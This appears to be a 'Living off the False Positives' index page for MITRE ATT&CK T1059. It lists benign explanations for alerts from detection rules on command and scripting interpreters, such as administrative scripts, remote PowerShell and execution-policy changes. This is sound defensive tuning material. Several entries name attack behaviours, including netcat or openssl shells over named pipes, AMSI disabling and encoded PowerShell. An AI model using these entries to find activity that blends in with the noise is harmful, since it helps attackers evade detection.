LoFP LoFP / t1059

t1059

TitleTags
a network operator or systems administrator may utilize an automated host discovery application that may generate false positives. filter as needed.
a new cloudshell may be created by a system administrator.
admin activity
administrative activity
administrative script libraries
administrative scripts
administrative scripts that use the same keywords.
administrator script
administrator scripts
administrators may attempt to change the default execution policy on a system for a variety of reasons. however, setting the policy to \"unrestricted\" or \"bypass\" as this search is designed to identify, would be unusual. hits should be reviewed and investigated as appropriate.
administrators may use the command prompt for regular administrative tasks. it's important to baseline your environment for network connections being made from the command prompt to determine any abnormal use of this tool.
administrators or installed processes that leverage nohup
administrators or power users may use this powershell commandlet for troubleshooting.
administrators, administrative actions or certain applications may run many instances of taskhost and taskhostex concurrently. filter as needed.
amazon ssm document worker
an administrator may need to exec into a pod for a legitimate reason like debugging purposes. containers built from linux and windows os images, tend to include debugging utilities. in this case, an admin may choose to run commands inside a specific container with kubectl exec ${pod_name} -c ${container_name} -- ${cmd} ${arg1} ${arg2} ... ${argn}. for example, the following command can be used to look at logs from a running cassandra pod: kubectl exec cassandra --cat /var/log/cassandra/system.log . additionally, the -i and -t arguments might be used to run a shell connected to the terminal: kubectl exec -i -t cassandra -- sh
application installers might contain scripts as part of the installation process.
appvclient
automation scripting language may used by network operator to do ldap query.
be aware of potential false positives - legitimate uses of the /webauth_operation.php endpoint may cause benign activities to be flagged.the url in the analytic is specific to a successful attempt to exploit the vulnerability. review contents of the http body to determine if the request is malicious. if the request is benign, add the url to the whitelist or continue to monitor.
benign administrative tasks can also trigger alerts, necessitating a firm understanding of the typical system behavior and precise tuning of the analytic to reduce false positives.
ccm
certain kinds of security testing may trigger this alert. powershell scripts that use high levels of obfuscation or have unusual script block payloads may trigger this alert.
citrix configsync.ps1
command execution on a virtual machine may be done by a system or network administrator. verify whether the username, hostname, and/or resource name should be making changes in your environment. command execution from unfamiliar users or hosts should be investigated. if known behavior is causing false positives, it can be exempted from the rule.
custom organization-specific macos packages that use .pkg files to run curl could trigger this rule. if known behavior is causing false positives, it can be excluded from the rule.
depending on the scripts, this rule might require some initial tuning to fit the environment
direct ps command execution through sqlps.exe is uncommon, childprocess sqlps.exe spawned by sqlagent.exe is a legitimate action.
direct ps command execution through sqltoolsps.exe is uncommon, childprocess sqltoolsps.exe spawned by smss.exe is a legitimate action.
directories /dev/shm and /run/shm are temporary file storage directories in linux. they are intended to appear as a mounted file system, but uses virtual memory instead of a persistent storage device and thus are used for mounting file systems in legitimate purposes.
false positive are expected with legitimate sources
false positive may vary depends on the score you want to check. the bigger number of path traversal string count the better.
false positives are expected from legitimate applications generating events that are similar to those generated by malicious activity. for example, event id 1122 is generated when a process attempts to load a dll that is blocked by an asr rule. this can be triggered by legitimate applications that attempt to load dlls that are not blocked by asr rules. this is block only.
false positives are not expected with this analytic, since it is a hunting analytic. it is meant to show the use of asr rules and how they can be used to detect malicious activity.
false positives depend on scripts and administrative tools used in the monitored environment
false positives may be high based on legitimate scripted code in any environment. filter as needed.
false positives may be present and filtering will need to occur by parent process or command line argument. it may be required to modify this query to an edr product for more granular coverage.
false positives may be present based on legacy applications or utilities. win32_scheduledjob uses the remote procedure call (rpc) protocol to create scheduled tasks on remote computers. it uses the dcom (distributed component object model) infrastructure to establish a connection with the remote computer and invoke the necessary methods. the rpc service needs to be running on both the local and remote computers for the communication to take place.
false positives may be present if a suspicious processname is similar to a benign processname.
false positives may be present if the application is legitimately used, filter by user or endpoint as needed.
false positives may be present when an administrator utilizes the cmdlets in the query. filter or monitor as needed.
false positives may be present, but most likely not. filter as needed.
false positives may only pertain to it not being related to empire, but another framework. filter as needed if any applications use the same pattern.
false positives might occur if the users are unaware of such control checks
false positives should be limited as day to day scripts do not use this method.
false positives should be limited as there is a small subset of binaries that contain the original file name of ab.exe. filter as needed.
false positives should be limited, however it is possible to filter by processes.process_name and specific processes (ex. wscript.exe). filter as needed. this may need modification based on edr telemetry and how it brings in registry data. for example, removal of (default).
false positives should be limited. filter as needed.
false positives should be very limited as this is strict to metasploit behavior.
false positives will be found. https and http is a url protocol handler that will trigger this analytic. tune based on process or command-line.
false positives will be present based on many factors. tune the correlation as needed to reduce too many triggers.
false positives will be present if any scripts are adding to inprocserver32. filter as needed.
false positives will only be present if the windbg process legitimately spawns autoit3. filter as needed.
false-positives (fp) should be at a minimum with this detection as pid files are meant to hold process ids, not inherently be executables that spawn processes.
github operations such as ghe-backup
go utilities that use staaldraad awesome ntlm library
high
in rare administrative cases, this function might be used to check network connectivity
inline scripting can be used by some rare third party applications or administrators. investigate and apply additional filters accordingly
it is possible administrators or scripts may run these commands, filtering may be required.
it is possible there will be false positives, filter as needed.
java tools are known to produce false-positive when loading libraries
legitimate administration script
legitimate administrative script
legitimate administrative scripts
legitimate browser install, update and recovery scripts
legitimate certificate exports by administrators. additional filters might be required.
legitimate commands in .lnk files
legitimate exchange system administration activity.
legitimate powershell scripts that make use of psreflect to access the win32 api
legitimate powershell scripts that make use of these functions.
legitimate powershell scripts which makes use of compression and encoding.
legitimate powershell web access installations by administrators
legitimate process can have this combination of command-line options, but it's not common.
legitimate scheduled tasks may be created during installation of new software.
legitimate script
legitimate scripts that use iex
legitimate software that uses these patterns
legitimate software uses the scripts (preinstall, postinstall)
legitimate tools that accidentally match on the searched patterns
legitimate usage of dsinternals for administration or audit purpose.
legitimate usage of remote powershell, e.g. for monitoring purposes.
legitimate usage of remote powershell, e.g. remote administration and monitoring.
legitimate usage of the unsafe option
legitimate use
legitimate use by a via a batch script or by an administrator.
legitimate use by an administrator
legitimate use by vm administrator
legitimate use of pester for writing tests for powershell scripts and modules
legitimate use of remote powershell execution
legitimate use of screenconnect
legitimate use of screenconnect. disable this rule if screenconnect is heavily used.
legitimate use remote powershell sessions
legitimate use to pass password to different powershell commands
legitimate use via a batch script or by an administrator.
legitimate users and processes, such as system administration tools, may utilize shell utilities inside a container resulting in false positives.
likely
likely. many admin scripts and tools leverage powershell in their bat or vb scripts which may trigger this rule often. it is best to add additional filters or use this to hunt for anomalies
limited false positives may be present. filter as needed based on initial analysis.
limited false positives. filter as needed.
limited false positives. may filter as needed.
limited to no known false positives.
many benign applications will create processes from executables in windows\temp, although unlikely to exceed the given threshold. filter as needed.
microsoft operations manager (mom)
microsoft sccm
microsoft windows installers leveraging rundll32 for installation.
moderate-to-low; despite the shorter length/lower entropy for some of these, because of high specificity, fp appears to be fairly limited in many environments.
msp detection searcher
need tuning applocker or add exceptions in siem
netcat and openssl are common tools used for establishing network connections and creating encryption keys. while they are popular, capturing the stdout and stderr in a named pipe pointed to a shell is anomalous.
netcat is a dual-use tool that can be used for benign or malicious activity. netcat is included in some linux distributions so its presence is not necessarily suspicious. some normal use of this program, while uncommon, may originate from scripts, automation tools, and frameworks.
network service user name of a not-covered localization
noise and false positive can be seen if the following instant messaging is allowed to use within corporate network. in this case, a filter is needed.
not known at this moment.
note that false positives may occur due to the use of the enable-psremoting cmdlet by legitimate users, such as system administrators. it is recommended to apply appropriate filters as needed to minimize the number of false positives.
other programs that use these command line option and accepts an 'all' parameter
other scripts
other tools or script may used this to change code page to utf-* or others
other tools that incidentally use the same command line parameters
other tools that work with encoded scripts in the command line instead of script files
planned windows defender configuration changes.
potential for some third party applications to disable amsi upon invocation. filter as needed.
powershell and windows command shell are often observed as legit child processes of the jetbrains teamcity service and may require further tuning.
powershell may used this function to process compressed data.
powershell may used this function to store out object into memory.
powershell remoting is a dual-use protocol that can be used for benign or malicious activity. it's important to baseline your environment to determine the amount of noise to expect from this tool.
powershell scripts running as system user
powershell scripts that download content from the internet
powershell scripts that use this capability for troubleshooting.
programs using powershell directly without invocation of a dedicated interpreter.
python libraries that use a flag starting with \"-c\". filter according to your environment
scripts or tools that download files
security audits, maintenance, and network administrative scripts may trigger this alert when run under web processes.
software installers that pull packages from remote systems and execute them
some false positives are expected in some environment that may use this functionality to install and test their custom applications
some false positives may arise in some environment and this may require some tuning. add additional filters or reduce level depending on the level of noise
some installers might generate a similar behavior. an initial baseline is required
some powershell installers were seen using similar combinations. apply filters accordingly
the build engine is commonly used by windows developers but use by non-engineers is unusual.
there are circumstances where an application may legitimately execute and interact with the windows command-line interface. investigate and modify the lookup file, as appropriate.
there are no known false positive for this search, but it could contain false positives as multiple detections can trigger and not have successful exploitation. modify the static value distinct_detection_name to a higher value. it is also required to tune analytics that are also tagged to ensure volume is never too much.
there may be legitimate reasons to bypass the powershell execution policy. the powershell script being run with this parameter should be validated to ensure that it is legitimate.
these characters might be legitimately on the command-line, but it is not common.
this detection may also be triggered by legitimate applications and numerous service accounts, which often end with a $ sign. to manage this, it's advised to check the service account's activities and, if they are valid, modify the filter macro to exclude them.
trusted solarwinds child processes. verify process details such as network connections and file writes.
unlikely
use of get-command and get-help modules to reference invoke-webrequest and start-bitstransfer.
used by microsoft sql server management studio
used by some .net binaries, minimal on user workstation.
valid changes to the startup script
valid usage of s3 browser for iam loginprofile listing and/or creation
valid usage of s3 browser for iam user and/or accesskey creation
valid usage of s3 browser with accidental creation of default inline iam policy without changing default s3 bucket name placeholder value
very special / sneaky powershell scripts
windows defender atp
windows firewall can be disabled by a system administrator. verify whether the user identity, user agent, and/or hostname should be making changes in your environment. windows profile being disabled by unfamiliar users should be investigated. if known behavior is causing false positives, it can be exempted from the rule.
winrm